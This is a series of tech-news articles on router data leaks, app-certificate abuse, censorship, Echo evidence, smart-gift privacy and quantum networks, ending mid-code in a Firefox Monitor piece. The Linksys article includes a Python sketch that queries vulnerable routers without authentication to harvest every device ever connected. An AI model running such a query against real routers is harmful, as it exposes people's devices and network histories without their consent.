>20,000 Linksys routers leak historic record of every device ever connected

Independent researcher Troy Mursch said the leak is the result of a flaw in almost three dozen models of Linksys routers. It took about 25 minutes for BinaryEdge, a search engine for Internet-connected devices, to find 21,401 vulnerable devices on Friday. A scan earlier in the week found 25,617. Together, they were leaking a total of 756,565 unique MAC addresses. Exploiting the flaw requires only a few lines of code that harvest every MAC address, device name, and operating system that has ever connected to each vulnerable router.
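
To give a sense of how little effort is involved, here is a minimal Python sketch of the kind of unauthenticated query Mursch describes. The endpoint path, JNAP action name and response field names below are assumptions based on public write-ups of the Linksys Smart Wi-Fi (JNAP) protocol, not details confirmed in this article.

```python
# Hedged sketch: query a (hypothetically vulnerable) Linksys router for its
# historical device list. The JNAP action, endpoint and field names are assumed.
import json

import requests  # third-party: pip install requests

JNAP_ENDPOINT = "/JNAP/"  # assumed unauthenticated JNAP endpoint
JNAP_ACTION = "http://linksys.com/jnap/devicelist/GetDevices3"  # assumed action name


def fetch_device_history(router_ip, timeout=5.0):
    """Return a list of devices the router remembers having seen."""
    resp = requests.post(
        "http://{}{}".format(router_ip, JNAP_ENDPOINT),
        headers={"X-JNAP-Action": JNAP_ACTION},
        data=json.dumps({}),
        timeout=timeout,
    )
    resp.raise_for_status()
    output = resp.json().get("output", {})
    devices = []
    for device in output.get("devices", []):
        devices.append({
            "name": device.get("friendlyName"),
            "os": device.get("operatingSystem"),
            "macs": [i.get("macAddress") for i in device.get("knownInterfaces", [])],
        })
    return devices
```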

The radio navigation planes use to land safely is insecure and can be hacked

A plane in the researchers’ demonstration attack as spoofed ILS signals induce a pilot to land to the right of the runway. (credit: Sathaye et al.)

Using a software-defined radio, the researchers can spoof airport signals in a way that causes a pilot’s navigation instruments to falsely indicate a plane is off course. Normal training calls for the pilot to adjust the plane’s descent rate or alignment accordingly, creating a potential accident as a result.

Everything you need to know about Facebook, Google’s app scandal

Facebook and Google landed in hot water with Apple this week after two investigations by TechCrunch revealed the misuse of internal-only certificates — leading to their revocation, which led to a day of downtime at the two tech giants.

Confused about what happened? Here’s everything you need to know.

How did all this start, and what happened?

On Monday, we revealed that Facebook was misusing an Apple-issued enterprise certificate that is only meant for companies to use to distribute internal, employee-only apps without having to go through the Apple App Store. But the social media giant used that certificate to sign an app that Facebook distributed outside the company, violating Apple’s rules.

The app, known simply as “Research,” allowed Facebook unparalleled access to all of the data flowing out of a device. This included access to some of the users’ most sensitive network data. Facebook paid users — including teenagers — $20 per month to install the app. But it wasn’t clear exactly what kind of data was being vacuumed up, or for what reason.

It turns out that the app was a repackaged app that was effectively banned from Apple’s App Store last year for collecting too much data on users.

Apple was angry that Facebook was misusing its special-issue enterprise certificates to push an app it had already banned, and revoked the certificate — rendering the app unable to open. But Facebook was using that same certificate to sign its other employee-only apps, effectively knocking them offline until Apple re-issued the certificate.

Then, it turned out Google was doing almost exactly the same thing with its Screenwise app, and Apple’s ban-hammer fell again.

What’s the controversy over these enterprise certificates and what can they do?

If you want to develop apps for Apple devices, you have to abide by Apple’s rules — and Apple expressly makes companies agree to its terms.

A key rule is that Apple doesn’t allow app developers to bypass the App Store, where every app is vetted to ensure it’s as secure as it can be. It does, however, grant exceptions for enterprise developers, such as companies that want to build apps that are only used internally by their employees. Facebook and Google in this case signed up as enterprise developers and agreed to Apple’s developer terms.

Each Apple-issued certificate grants companies permission to distribute apps they develop internally — including pre-release versions of the apps they make, for testing purposes. But these certificates aren’t allowed to be used for ordinary consumers, as they have to download apps through the App Store.

What’s a “root” certificate, and why is its access a big deal?

Because Facebook’s Research and Google’s Screenwise apps were distributed outside of Apple’s App Store, users had to install them manually — a process known as sideloading. That requires going through a convoluted few steps: downloading the app itself, then opening and trusting either Facebook’s or Google’s enterprise developer code-signing certificate, which is what allows the app to run.

After the app was installed, both companies required users to agree to an additional configuration step — known as a VPN configuration profile — allowing all of the data flowing out of that user’s phone to funnel down a special tunnel that directs it all to either Facebook or Google, depending on which app was installed.

This is where the Facebook and Google cases differ.

Google’s app collected data and sent it off to Google for research purposes, but it couldn’t access encrypted data — such as the content of any network traffic protected by HTTPS, as most apps in the App Store and most websites are.

Facebook, however, went far further. Its users were asked to go through an additional step to trust another type of certificate at the “root” level of the phone. Trusting this Facebook Research root certificate authority allowed the social media giant to look at all of the encrypted traffic flowing out of the device — essentially what we call a “man-in-the-middle” attack. That allowed Facebook to sift through your messages, your emails and any other bit of data that leaves your phone. Only apps that use certificate pinning — rejecting any certificate that isn’t their own — were protected, such as iMessage, Signal and other end-to-end encrypted apps.
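
For readers wondering how pinning blocks this kind of interception: a pinned app ships with a hash of the certificate (or public key) it expects, and refuses to talk to any server presenting something else — even a certificate chained to a root the phone has been told to trust. Below is a minimal Python sketch of the idea; the pin value is a placeholder, and real apps pin the SubjectPublicKeyInfo rather than the whole certificate.

```python
# Hedged sketch of certificate pinning. The pin below is a placeholder value.
import base64
import hashlib
import socket
import ssl

PINNED_HASHES = {"47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU="}  # placeholder pin


def pin_matches(hostname, port=443):
    """Connect over TLS and check the presented certificate against our pin."""
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            der_cert = tls.getpeercert(binary_form=True)
    # For brevity this hashes the whole DER certificate; production pinning
    # hashes only the public key (SPKI) so certificates can rotate under one key.
    digest = hashlib.sha256(der_cert).digest()
    return base64.b64encode(digest).decode() in PINNED_HASHES
```

A man-in-the-middle presenting its own certificate produces a different hash, so the check fails and the app drops the connection.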

Facebook’s Research app requires root certificate access, which lets Facebook gather almost any piece of data transmitted by your phone. (Image: supplied)

Google’s app might not have been able to look at encrypted traffic, but the company still flouted the rules — and had its separate enterprise developer code-signing certificate revoked anyway.

What data did Facebook have access to on iOS?

It’s hard to know for sure, but it definitely had access to more data than Google.

Facebook said its app was to help it “understand how people use their mobile devices.” In reality, at the root traffic level, Facebook could have accessed any kind of data that left your phone.

Will Strafach, a security expert with whom we spoke for our story, said: “If Facebook makes full use of the level of access they are given by asking users to install the certificate, they will have the ability to continuously collect the following types of data: private messages in social media apps, chats from in instant messaging apps – including photos/videos sent to others, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps you may have installed.”

Remember: this isn’t “root” access to your phone, like jailbreaking, but root access to the network traffic.

How does this compare to the technical ways other market research programs work?

In fairness, market research apps like these aren’t unique to Facebook or Google. Several other companies, like Nielsen and comScore, run similar programs, but neither asks users to install a VPN or provide root access to the network.

In any case, Facebook already has a lot of your data — as does Google. Even if the companies only wanted to look at your data in aggregate with other people, they can still home in on who you talk to, when, for how long and, in some cases, what about. It might not have been such an explosive scandal had Facebook not spent the last year cleaning up after several security and privacy breaches.

Can they capture the data of people the phone owner interacts with?

In both cases, yes. In Google’s case, any unencrypted data that involves another person’s data could have been collected. In Facebook’s case, it goes far further — any data of yours that interacts with another person, such as an email or a message, could have been collected by Facebook’s app.

How many people did this affect?

It’s hard to know for sure. Neither Google nor Facebook has said how many users the apps had; between them, it’s believed to be in the thousands. As for the employees affected by the app outages, Facebook has more than 35,000 employees and Google has more than 94,000.

Why did internal apps at Facebook and Google break after Apple revoked the certificates?

You might own your Apple device, but Apple still gets to control what goes on it.

Apple can’t control Facebook’s root certificates, but it can control the enterprise certificates it issues. After Facebook was caught out, Apple said: “Any developer using their enterprise certificates to distribute apps to consumers will have their certificates revoked, which is what we did in this case to protect our users and their data.” That meant any app that relied on Facebook’s enterprise certificate — including those used inside the company — would fail to load. That included not just pre-release builds of Facebook, Instagram and WhatsApp that staff were working on, but reportedly also the company’s travel and collaboration apps. In Google’s case, even its catering and lunch menu apps were down.

Facebook’s internal apps were down for about a day, while Google’s internal apps were down for a few hours. None of Facebook or Google’s consumer services were affected, however.

How are people viewing Apple in all this?

Nobody seems thrilled with Facebook or Google at the moment, but not many are happy with Apple, either. Even though Apple sells hardware and doesn’t use your data to profile you or serve you ads — like Facebook and Google do — some are uncomfortable with how much power Apple has over the customers — and enterprises — that use its devices.

Revoking Facebook’s and Google’s enterprise certificates caused downtime and had a knock-on effect inside both companies.

Is this legal in the U.S.? What about in Europe with GDPR?

Well, it’s not illegal — at least in the U.S. Facebook says it gained consent from its users. The company even said its teenage users must obtain parental consent, even though that step was easily skippable and no verification checks were made. It wasn’t even explicitly clear that the children who “consented” really understood how much privacy they were handing over.

That could lead to major regulatory headaches down the line. “If it turns out that European teens have been participating in the research effort Facebook could face another barrage of complaints under the bloc’s General Data Protection Regulation (GDPR) — and the prospect of substantial fines if any local agencies determine it failed to live up to consent and ‘privacy by design’ requirements baked into the bloc’s privacy regime,” wrote TechCrunch’s Natasha Lomas.

Who else has been misusing certificates?

Don’t think that Facebook and Google are alone in this. It turns out that a lot of companies might be flouting the rules, too.

According to several people posting their findings on social media, Sonos uses enterprise certificates for its beta program, as does finance app Binance, as well as DoorDash for its fleet of contractors. It’s not known if Apple will also revoke their enterprise certificates.

What next?

It’s anybody’s guess, but don’t expect this situation to die down any time soon.

Facebook may face repercussions in Europe, as well as at home. Two U.S. senators, Mark Warner and Richard Blumenthal, have already called for action, accusing Facebook of “wiretapping teens.” The Federal Trade Commission may also investigate, if Blumenthal gets his way.

Scooter startup Bird tried to silence a journalist. It did not go well.

Cory Doctorow doesn’t like censorship. He especially doesn’t like his own work being censored.

Anyone who knows Doctorow knows his popular tech and culture blog, Boing Boing, and anyone who reads Boing Boing knows Doctorow and his cohort of bloggers. The part-blogger, part special advisor at the online rights group Electronic Frontier Foundation has written for years on topics of technology, hacking, security research, online digital rights and censorship and its intersection with free speech and expression.

Yet, this week it looked like his own free speech and expression could have been under threat.

Doctorow revealed in a blog post on Friday that scooter startup Bird sent him a legal threat, accusing him of copyright infringement and that his blog post encourages “illegal conduct.”

In its letter to Doctorow, Bird demanded that he “immediately take[s] down this offensive blog.”

Doctorow declined, published the legal threat and fired back with a rebuttal letter from the EFF accusing the scooter startup of making “baseless legal threats” in an attempt to “suppress coverage that it dislikes.”

The whole debacle started after Doctorow wrote about how Bird’s many abandoned scooters can be easily converted into a “personal scooter” by swapping out their innards with a plug-and-play converter kit. Citing an initial write-up by Hackaday, Doctorow noted that these scooters can have “all recovery and payment components permanently disabled” using the converter kit, available for purchase from China on eBay for about $30.

In fact, Doctorow’s blog post was only two paragraphs long and, though it didn’t link to the eBay listing directly, did cite the hacker who wrote about it in the first place — bringing interesting things to the masses in bite-size form in true Boing Boing fashion.

Bird didn’t like this much, and senior counsel Linda Kwak sent the letter — which the EFF published today — claiming that Doctorow’s blog post was “promoting the sale/use of an illegal product that is solely designed to circumvent the copyright protections of Bird’s proprietary technology, as described in greater detail below, as well as promoting illegal activity in general by encouraging the vandalism and misappropriation of Bird property.” The letter also falsely stated that Doctorow’s blog post “provides links to a website where such Infringing Product may be purchased,” given that the post at no point links to the purchasable eBay converter kit.

EFF senior attorney Kit Walsh fired back. “Our client has no obligation to, and will not, comply with your request to remove the article,” she wrote. “Bird may not be pleased that the technology exists to modify the scooters that it deploys, but it should not make baseless legal threats to silence reporting on that technology.”

The three-page rebuttal says Bird incorrectly cited legal statutes to substantiate its demands for Boing Boing to pull down the blog post. The letter added that unplugging and discarding a motherboard containing unwanted code within the scooter isn’t an act of circumvention, as it doesn’t bypass or modify Bird’s code — which is what copyright law prohibits.

As Doctorow himself put it in his blog post Friday: “If motherboard swaps were circumvention, then selling someone a screwdriver could be an offense punishable by a five year prison sentence and a $500,000 fine.”

In an email to TechCrunch, Doctorow said that legal threats “are no fun.”

AUSTIN, TX – MARCH 10: Journalist Cory Doctorow speaks onstage at “Snowden 2.0: A Field Report from the NSA Archives” during the 2014 SXSW Music, Film + Interactive Festival at Austin Convention Center on March 10, 2014 in Austin, Texas. (Photo by Travis P Ball/Getty Images for SXSW)

“We’re a small, shoestring operation, and even though this particular threat is one that we have very deep expertise on, it’s still chilling when a company with millions in the bank sends a threat — even a bogus one like this — to you,” he said.

The EFF’s response also said that Doctorow’s freedom of speech “does not in fact impinge on any of Bird’s rights,” adding that Bird should not send takedown notices to journalists using “meritless legal claims.”

“So, in a sense, it doesn’t matter whether Bird is right or wrong when it claims that it’s illegal to convert a Bird scooter to a personal scooter,” said Walsh in a separate blog post. “Either way, Boing Boing was free to report on it,” she added.

What’s bizarre is why Bird targeted Doctorow and, apparently, nobody else — so far.

TechCrunch reached out to several people who wrote about and were involved with blog posts and write-ups about the Bird converter kit. Of those who responded, all said they had not received a legal demand from Bird.

We asked Bird why it sent the letter, and if this was a one-off letter or if Bird had sent similar legal demands to others. When reached, a Bird spokesperson did not comment on the record.

Two hours after we published this story, Bird spokesperson Rebecca Hahn said the company supports freedom of speech, adding: “In the quest for curbing illegal activities related to our vehicles, our legal team overstretched and sent a takedown request related to the issue to a member of the media. This was our mistake and we apologize to Cory Doctorow.”

All too often, companies send legal threats and demands to try to silence work or findings that they find critical, often using misinterpreted, incorrect or vague legal statutes to get things pulled from the internet. Some companies have been more successful than others, despite an increase in awareness and bug bounties, and a general willingness to fix security issues before they inevitably become public.

Now Bird becomes the latest in a long list of companies that have threatened reporters or security researchers, alongside companies like drone maker DJI, which in 2017 threatened a security researcher trying to report a bug in good faith, and spam operator River City, which sued a security researcher who found the spammer’s exposed servers and a reporter who wrote about it. Most recently, password manager maker Keeper sued a security reporter over allegedly defamatory remarks about a security flaw in one of its products. The case was eventually dropped, but not before more than 50 experts, advocates and journalists (including this reporter) signed onto a letter calling for companies to stop using legal threats to stifle and silence security researchers.

That effort resulted in several companies — notably Dropbox and Tesla — doubling down on their protection of security researchers by changing their vulnerability disclosure rules to promise that the companies will not seek to prosecute hackers acting in good faith.

But some companies have bucked that trend and have taken a more hostile, aggressive — and regressive — approach to security researchers and reporters.

“Bird Scooters and other dockless transport are hugely controversial right now, thanks in large part to a ‘move-fast, break-things’ approach to regulation, and it’s not surprising that they would want to control the debate,” said Doctorow.

“But to my mind, this kind of bullying speaks volumes about the overall character of the company,” he said.

Updated at 6pm ET: with statement from Bird.

Facebook is not equipped to stop the spread of authoritarianism

After the driver of a speeding bus ran over and killed two college students in Dhaka in July, student protesters took to the streets. They forced the ordinarily disorganized local traffic to drive in strict lanes and stopped vehicles to inspect license and registration papers. They even halted the vehicle of the chief of Bangladesh Police Bureau of Investigation and found that his license was expired. And they posted videos and information about the protests on Facebook.

The fatal road accident that led to these protests was hardly an isolated incident. Dhaka, Bangladesh’s capital, which was ranked the second least livable city in the world in the Economist Intelligence Unit’s 2018 global liveability index, scored 26.8 out of 100 in the infrastructure category included in the rating. But the regional government chose to stifle the highway safety protests anyway. It went so far as to raid residential areas adjacent to universities to check social media activity, leading to the arrest of 20 students. Although there were many images of Bangladesh Chhatra League (BCL) men committing acts of violence against students, none of them were arrested. (The BCL is the student wing of the ruling Awami League, one of the major political parties of Bangladesh.)

Students were forced to log into their Facebook profiles and were arrested or beaten for their posts, photographs and videos. In one instance, BCL men called three students into the dorm’s guest room, quizzed them over Facebook posts, beat them, then handed them over to police. They were reportedly tortured in custody.

A pregnant school teacher was arrested and jailed for just over two weeks for “spreading rumors” due to sharing a Facebook post about student protests. A photographer and social justice activist spent more than 100 days in jail for describing police violence during these protests; he told reporters he was beaten in custody. And a university professor was jailed for 37 days for his Facebook posts.

A Dhaka resident who spoke on the condition of anonymity out of fear for their safety said that the crackdown on social media posts essentially silenced student protesters, many of whom removed photos, videos and status updates about the protests from their profiles entirely. While the person thought that students were continuing to be arrested, they said, “nobody is talking about it anymore — at least in my network — because everyone kind of ‘got the memo,’ if you know what I mean.”

This isn’t the first time Bangladeshi citizens have been arrested for Facebook posts. As just one example, in April 2017, a rubber plantation worker in southern Bangladesh was arrested and detained for three months for liking and sharing a Facebook post that criticized the prime minister’s visit to India, according to Human Rights Watch.

Bangladesh is far from alone. Government harassment to silence dissent on social media has occurred across the region, and in other regions as well — and it often comes hand-in-hand with governments filing takedown requests with Facebook and requesting data on users.

Facebook has removed posts critical of the prime minister in Cambodia and reportedly “agreed to coordinate in the monitoring and removal of content” in Vietnam. Facebook was criticized for not stopping the repression of Rohingya Muslims in Myanmar, where military personnel created fake accounts to spread propaganda, which human rights groups say fueled violence and forced displacement. Facebook has since undertaken a human rights impact assessment in Myanmar, and it also took down coordinated inauthentic accounts in the country.

UNITED STATES – APRIL 10: Facebook CEO Mark Zuckerberg testifies during the Senate Commerce, Science and Transportation Committee and Senate Judiciary Committee joint hearing on “Facebook, Social Media Privacy, and the Use and Abuse of Data” on Tuesday, April 10, 2018. (Photo By Bill Clark/CQ Roll Call)

Protesters scrubbing Facebook data for fear of repercussion isn’t uncommon. Over and over again, authoritarian-leaning regimes have utilized low-tech strategies to quell dissent. And aside from providing resources related to online privacy and security, Facebook still has little in place to protect its most vulnerable users from these pernicious efforts. As various countries pass laws calling for a local presence and increased regulation, it is possible that the social media conglomerate doesn’t always even want to.

“In many situations, the platforms are under pressure,” said Raman Jit Singh Chima, policy director at Access Now. “Tech companies are being directly sent takedown orders, user data requests. The danger of that is that companies will potentially be overcomplying or responding far too quickly to government demands when they are able to push back on those requests,” he said.

Elections are often a critical moment for oppressive behavior from governments — Uganda, Chad and Vietnam have specifically targeted citizens — and candidates — during election time. Facebook announced just last Thursday that it had taken down nine Facebook pages and six Facebook accounts for engaging in coordinated inauthentic behavior in Bangladesh. These pages, which Facebook believes were linked to people associated with the Bangladesh government, were “designed to look like independent news outlets and posted pro-government and anti-opposition content.” The sites masqueraded as news outlets, including fake BBC Bengali, BDSNews24 and Bangla Tribune pages, as well as news pages with Photoshopped blue checkmarks, according to the Atlantic Council’s Digital Forensic Research Lab.

Still, the imminent election in Bangladesh doesn’t bode well for anyone who might wish to express dissent. In October, a digital security bill that regulates some types of controversial speech was passed in the country, signaling to companies that as the regulatory environment tightens, they too could become targets.

More restrictive regulation is part of a greater trend around the world, said Naman M. Aggarwal, Asia policy associate at Access Now. Some countries, like Brazil and India, have passed “fake news” laws. (A similar law was proposed in Malaysia, but it was blocked in the Senate.) These types of laws are frequently followed by content takedowns. (In Bangladesh, the government warned broadcasters not to air footage that could create panic or disorder, essentially halting news programming on the protests.)

Other governments in the Middle East and North Africa — such as Egypt, Algeria, United Arab Emirates, Saudi Arabia and Bahrain — clamp down on free expression on social media under the threat of fines or prison time. And countries like Vietnam have passed laws requiring social media companies to localize their storage and have a presence in the country — typically an indication of greater content regulation and pressure on the companies from local governments. In India, WhatsApp and other financial tech services were told to open offices in the country.

And crackdowns on posts about protests on social media come hand-in-hand with government requests for data. Facebook’s biannual transparency report provides detail on the percentage of government requests with which the company complies in each country, but most people don’t know until long after the fact. Between January and June, the company received 134 emergency requests and 18 legal processes from Bangladeshi authorities for 205 users or accounts. Facebook turned over at least some data in 61 percent of emergency requests and 28 percent of legal processes.

Facebook said in a statement that it “believes people deserve to have a voice, and that everyone has the right to express themselves in a safe environment,” and that it handles requests for user data “extremely carefully.”

The company pointed to its Facebook for Journalists resources and said it is “saddened by governments using broad and vague regulation or other practices to silence, criminalize or imprison journalists, activists, and others who speak out against them,” but the company said it also helps journalists, activists and other people around the world to “tell their stories in more innovative ways, reach global audiences, and connect directly with people.”

But there are policies that Facebook could enact that would help people in these vulnerable positions, like allowing users to post anonymously.

“Facebook’s real names policy doesn’t exactly protect anonymity, and has created issues for people in countries like Vietnam,” said Aggarwal. “If platforms provide leeway, or enough space for anonymous posting, and anonymous interactions, that is really helpful to people on the ground.”

BERLIN, GERMANY – SEPTEMBER 12: A visitor uses a mobile phone in front of the Facebook logo at the #CDUdigital conference on September 12, 2015 in Berlin, Germany. (Photo by Adam Berry/Getty Images)

A German court in February found the policy illegal under its decade-old privacy law. Facebook said it plans to appeal the decision.

“I’m not sure if Facebook even has an effective strategy or understanding of strategy in the long term,” said Sean O’Brien, lead researcher at Yale Privacy Lab. “In some cases, Facebook is taking a very proactive role… but in other cases, it won’t.” In any case, these decisions require a nuanced understanding of the population, culture, and political spectrum in various regions — something it’s not clear Facebook has.

Facebook isn’t responsible for government decisions to clamp down on free expression. But the question remains: How can companies stop assisting authoritarian governments, inadvertently or otherwise?

“If Facebook knows about this kind of repression, they should probably have… some sort of mechanism to at the very least heavily try to convince people not to post things publicly that they think they could get in trouble for,” said O’Brien. “It would have a chilling effect on speech, of course, which is a whole other issue, but at least it would allow people to make that decision for themselves.”

This could be an opt-in feature, but O’Brien acknowledges that it could create legal liabilities for Facebook, leading the social media giant to create lists of “dangerous speech” or profiles on “dissidents,” and could theoretically shut them down or report them to the police. Still, Facebook could consider rolling a “speech alert” feature to an entire city or country if that area becomes volatile politically and dangerous for speech, he said.

O’Brien says that social media companies could consider responding to situations where a person is being detained illegally and potentially coerced into giving their passwords in a way that could protect them, perhaps by triggering a temporary account reset or freeze to prevent anyone from accessing the account without proper legal process. Some actions that might trigger the reset or freeze could be news about an individual’s arrest — if Facebook is alerted to it, contact from the authorities, or contact from friends and loved ones, as evaluated by humans. There could even be a “panic button” type trigger, like Guardian Project’s PanicKit, but for Facebook — allowing users to wipe or freeze their own accounts or posts tagged preemptively with a code word only the owner knows.

“One of the issues with computer interfaces is that when people log into a site, they get a false sense of privacy even when the things they’re posting in that site are widely available to the public,” said O’Brien. Case in point: this year, women anonymously shared their experiences of abusive co-workers in a shared Google Doc — the so-called “Shitty Media Men” list, likely without realizing that a lawsuit could unmask them. That’s exactly what is happening.

Instead, activists and journalists often need to tap into resources and gain assistance from groups like Access Now, which runs a digital security helpline, and the Committee to Protect Journalists. These organizations can provide personal advice tailored to their specific country and situation. They can access Facebook over the Tor anonymity network. They can use VPNs, end-to-end encrypted messaging tools and non-phone-based two-factor authentication methods. But many may not realize what the threat is until it’s too late.

The violent crackdown on free speech in Bangladesh accompanied government-imposed internet restrictions, including the throttling of internet access around the country. Users at home with a broadband connection did not feel the effects of this, but “it was the students on the streets who couldn’t go live or publish any photos of what was going on,” the Dhaka resident said.

Elections will take place in Bangladesh on December 30.

In the few months leading up to the election, Access Now says it’s noticed an increase in Bangladeshi residents expressing concern that their data has been compromised and seeking assistance from its digital security helpline.

Other rights groups have also found an uptick in malicious activity.

Meenakshi Ganguly, South Asia director at Human Rights Watch, said in an email that the organization is “extremely concerned about the ongoing crackdown on the political opposition and on freedom of expression, which has created a climate of fear ahead of national elections.”

Ganguly cited politically motivated cases against thousands of opposition supporters, many of whom have been arrested, as well as candidates who have been attacked.

Human Rights Watch issued a statement about the situation, warning that the Rapid Action Battalion, a “paramilitary force implicated in serious human rights violations including extrajudicial killings and enforced disappearances,” has been “tasked with monitoring social media for ‘anti-state propaganda, rumors, fake news, and provocations.’” This is in addition to a nine-member monitoring cell and around 100 police teams dedicated to quashing so-called “rumors” on social media, amid the looming threat of news website shutdowns.

“The security forces continue to arrest people for any criticism of the government, including on social media,” Ganguly said. “We hope that the international community will urge the Awami League government to create conditions that will uphold the rights of all Bangladeshis to participate in a free and fair vote.”

Judge orders Amazon to turn over Echo recordings in double murder case

A New Hampshire judge has ordered Amazon to turn over two days of Amazon Echo recordings in a double murder case.

Prosecutors believe that recordings from an Amazon Echo in a Farmington home where two women were murdered in January 2017 may yield further clues to their killer. Although police seized the Echo when they secured the crime scene, any recordings are stored on Amazon servers.

The order granting the search warrant, obtained by TechCrunch, said that there is “probable cause to believe” that the Echo picked up “audio recordings capturing the attack” and “any events that preceded or succeeded the attack.”

Amazon is also directed to turn over any “information identifying any cellular devices that were linked to the smart speaker during that time period,” the order said.

Timothy Verrill, a resident of neighboring Dover, New Hampshire, was charged with two counts of first-degree murder. He pleaded not guilty and awaits trial.

When reached, an Amazon spokesperson did not comment — but the company told the Associated Press last week that it won’t release the information “without a valid and binding legal demand properly served on us.”

New Hampshire doesn’t provide electronic access to court records, so it’s not readily known if Amazon has complied with the order, signed by Justice Steven Houran, on November 5.

A court order signed by New Hampshire Superior Court on November 5 ordering Amazon to turn over Echo recordings. (Image: TechCrunch)

It’s not the first time Amazon has been ordered to turn over recordings that prosecutors believe may help a police investigation.

Three years ago, an Arkansas man was accused of murder. Prosecutors pushed Amazon to turn over data from an Echo found in the house where the body was found. Amazon initially resisted the request, citing First Amendment grounds — but later conceded and complied. Police and prosecutors generally don’t expect much evidence from Echo recordings — if any — because Echo speakers are activated with a wake word, usually “Alexa,” the name of the voice assistant. But sometimes fragments of recordings can be inadvertently picked up, which could help piece together events from a crime scene.

But these two cases represent a fraction of the number of requests Amazon receives for Echo data. Although Amazon publishes a biannual transparency report detailing the number of warrants and orders it receives across its entire business, the company doesn’t break down — and refuses to say — how many of those requests are for Echo data.

In most cases, requests for Echo recordings only become known through court orders.

In fact, when TechCrunch reached out to the major players in the smart home space, only one device maker had a transparency report and most had no future plans to publish one — leaving consumers in the dark on how these companies protect their private information from overly broad demands.

Although the evidence in the Verrill case is compelling, exactly what comes back from Amazon — or the company’s refusal to budge — will be telling.

Mozilla ranks dozens of popular ‘smart’ gift ideas on creepiness and security

If you’re planning on picking up some cool new smart device for a loved one this holiday season, it might be worth your while to check whether it’s one of the good ones or not. Not just in the quality of the camera or step tracking, but the security and privacy practices of the companies that will collect (and sell) the data it produces. Mozilla has produced a handy resource ranking 70 of the latest items, from Amazon Echos to smart teddy bears.

Each of the dozens of toys and devices is graded on a number of measures: what data does it collect? Is that data encrypted when it is transmitted? Who is it shared with? Are you required to change the default password? And what’s the worst case scenario if something went wrong?

Some of the security risks are inherent to the product — for example, security cameras can potentially see things you’d rather they didn’t — but others are oversights on the part of the company: security practices like respecting account deletion, not sharing data with third parties, and so on.

At the top of the list are items getting most of it right — this Mycroft smart speaker, for instance, uses open source software and the company that makes it makes all the right choices. Their privacy policy is even easy to read! Lots of gadgets seem just fine, really. This list doesn’t just trash everything.

On the other hand, you have something like this Dobby drone. They don’t seem to even have a privacy policy — bad news when you’re installing an app that records your location, HD footage, and other stuff! Similarly, this Fredi baby monitor comes with a bad password you don’t have to change, and has no automatic security updates. Are you kidding me? Stay far, far away.

Altogether, 33 of the products met Mozilla’s recently proposed “minimum security standards” for smart devices (and got a nice badge); seven failed, and the rest fell somewhere in between. In addition to these official measures there’s a crowd-sourced (hopefully not to be gamed) “creep-o-meter” where prospective buyers can indicate how creepy they find a device. But why is BB-8 creepy? I’d take that particular metric with a grain of salt.

New plans aim to deploy the first US quantum network from Boston to Washington, DC

About 800 kilometers of unused fiber optic cable running down the U.S. eastern seaboard is set to become the first stateside quantum network.

The aim is to get the quantum network up and running and accepting customers by the end of the year, making it the first time that quantum keys will be exchanged commercially on U.S. soil.

Quantum Xchange, a Bethesda, Maryland-based quantum communications provider, has inked a deal for Zayo, a fiber network giant, to provide the stretch of fiber from Boston to Washington, DC. Its first aim is to help connect Wall Street financiers with their back operations in nearby New Jersey, but the hope is that other industries — from healthcare to critical infrastructure — will soon use the network for their own secure communications.

Quantum cryptography and networking aren’t new concepts, but they have risen to prominence in recent years as both a threat to some encryption and the savior of future secure communications. Relying on photons and the laws of quantum physics to share encryption keys over a long distance from one place to another makes it significantly harder to intercept the keys without breaking the beam or perfectly cloning a copy. This technique, known as quantum key distribution (QKD), is seen as a likely contender for the future of end-to-end encryption.
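
As a rough illustration of what exchanging keys with photons means in practice, here is a toy Python simulation of the sifting step of BB84, the best-known QKD protocol; it is illustrative only and says nothing about Quantum Xchange’s actual system. The sender encodes random bits in random bases, the receiver measures in its own random bases, and the two keep only the positions where their bases happened to match.

```python
# Toy BB84 sifting simulation (no real photons involved).
import secrets


def bb84_sift(n_photons=32):
    # Alice encodes random bits in randomly chosen bases (0 = rectilinear, 1 = diagonal).
    alice_bits = [secrets.randbelow(2) for _ in range(n_photons)]
    alice_bases = [secrets.randbelow(2) for _ in range(n_photons)]
    # Bob measures each photon in his own randomly chosen basis; a mismatched
    # basis yields a random result, which is why those positions are discarded.
    bob_bases = [secrets.randbelow(2) for _ in range(n_photons)]
    bob_results = [
        bit if a == b else secrets.randbelow(2)
        for bit, a, b in zip(alice_bits, alice_bases, bob_bases)
    ]
    # Alice and Bob publicly compare bases (never bits) and keep matching positions.
    return [bob_results[i] for i in range(n_photons) if alice_bases[i] == bob_bases[i]]


print(bb84_sift())
```

An eavesdropper who measures the photons in transit disturbs them, introducing errors that both ends can detect by comparing a sample of the sifted key — which is what makes interception so hard.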

Although quantum cryptography has been around for years, it’s only been recently that scientists and computer engineers have harnessed the technology for practical uses. Soon, the technology could be used for protecting elections, transmitting payments and securing communications between data centers — even from satellites back to earth.

Europe has already seen some success in building a small-scale quantum network, but “shortcomings” made bringing the system to the U.S. more difficult, said Quantum Xchange chief executive John Prisco.

His company uses trusted node technology that passes quantum key data from point to point over a larger distance, making it easier to scale a quantum network over wider geographical spaces.

“Organizations with offices in Boston will be able to send secure communications to a partner in D.C., and eventually even further – as the goal is to keep buying up optical fiber that is already in the ground all over the country so that we can provide a secure quantum network that will serve the entire nation,” he said.

Prisco said it’s “critical” to establish a quantum key distribution network as a defensive measure “before the unprecedented power of quantum computers become an offensive weapon.”

Mozilla’s Firefox Monitor will now alert you when one of your accounts was hacked

Earlier this year, Mozilla announced Firefox Monitor, a service that tells you if your online accounts were hacked in a recent data breach. All you have to give it is your email address and it’ll use the Have I Been Pwned database to show you if you need to worry and what data was compromised. Today, Mozilla is taking this a step further by also letting you sign up for alerts for when your accounts appear in any (known) breaches in the future.
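
The lookup behind this is conceptually similar to querying Have I Been Pwned directly, as in the hedged Python sketch below. It uses the current public HIBP v3 breach API, which requires an API key; Mozilla’s own integration is server-side and more involved, so treat this as an approximation rather than Firefox Monitor’s actual code.

```python
# Hedged sketch: ask Have I Been Pwned which known breaches include an email address.
import requests  # third-party: pip install requests


def breaches_for(email, api_key):
    """Return the names of known breaches that include the given address."""
    resp = requests.get(
        "https://haveibeenpwned.com/api/v3/breachedaccount/{}".format(email),
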